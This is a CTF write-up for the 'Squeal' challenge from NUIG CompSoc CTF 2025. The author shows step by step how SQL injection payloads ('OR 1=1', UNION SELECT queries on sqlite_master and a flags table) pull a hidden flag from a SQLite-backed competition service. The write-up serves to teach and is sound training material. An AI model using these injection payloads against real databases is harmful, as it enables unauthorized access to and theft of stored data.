Squeal Writeup

Medium Binary Exploitation Chall for NUIG CompSoc CTF 2025

Posted on February 3, 2025
# CTF # Writeup # Pwn # Misc # NUIGCompSocCTF2025

Our server runs a light database that allows users to enter an artist’s name to check if they are in our Billboard Top 10 table. I wonder if there’s anything else interesting in that database…

Tools Used

netcat

Approach

Initial Analysis

I first connected to the service via netcat, and was greeted with the following:

1
2
3

nc 140.203.18.3 10020
This script accepts the name of an artist and checks if they are currently in the Billboard Top 10 table in our database, e.g. Sabrina Carpenter
Enter an artist's name:

My first impression was this was obviously a database of some sort, and I was going to have to exploit something related to this fact. My first guess was that this could be some kind of SQL database, as the title of the challenge was “Squeal” and the description mentions a “light database”. My guess is that this is a some kind of SQLite service running off this port. To see if this is true, and if it is exploitable, I did the ol’ reliable:

1

' OR 1=1 --

and got this output:

1
2
3
4
5
6
7
8
9
10

1|Die With A Smile|Lady Gaga, Bruno Mars
2|BIRDS OF A FEATHER|Billie Eilish
3|Taste|Sabrina Carpenter
4|Who|Jimin
5|Espresso|Sabrina Carpenter
6|The Emptiness Machine|Linkin Park
7|Please Please Please|Sabrina Carpenter
8|Si Antes Te Hubiera Conocido|KAROL G
9|Good Luck, Babe!|Chappell Roan
10|Beautiful Things|Benson Boone

Nice! This showed that the database was in fact some kind of SQLite database, and vulnerable to SQL injection.

Enumeration

Now that I knew SQL injection was possible, I wanted to see if there were more tables in the database, so I ran the following payload:

1

' UNION SELECT 1, name, 3 FROM sqlite_master WHERE type='table'; --

and it came back with the following:

1
2

1|flags|3
1|singles|3

I found that there was another table called flags, which was cool. Now I know which table I need to start looking at.

Finding the Flag

Now that I knew there was a table called flags, I looked into sqlite_master to see how the table was structured. This would help me navigate to the correct column to extract. So I crafted the following query to call sqlite_master and use it to inspect the schema table:

1

' UNION SELECT 1, sql, 3 FROM sqlite_master WHERE type='table' AND name='flags'; --

This returned:

1
2
3
4

CREATE TABLE flags (
    secret VARCHAR(255) NOT NULL,
    PRIMARY KEY (secret)
)

So now I knew the column I needed to get the flag was going to be in secret.

Extracting the Flag

With that knowledge, I queried the final paylaod to the server that i would need:

1

' UNION SELECT 1, secret, 3 FROM flags; --

and got:

1

1|CompSoc{v4cc1nati0n}|3

Coolio.

Solution

  • Flag: CompSoc{v4cc1nati0n}
━━━━━━ ❖ ━━━━━━
CONTENTS
    FEATURED TAGS
    Intro CTF Writeup Forensics Project TUCTF2025 Base64 College Misc NUIGCompSocCTF2025 Post Pwn Python Tutorial x86
    RELATED POSTS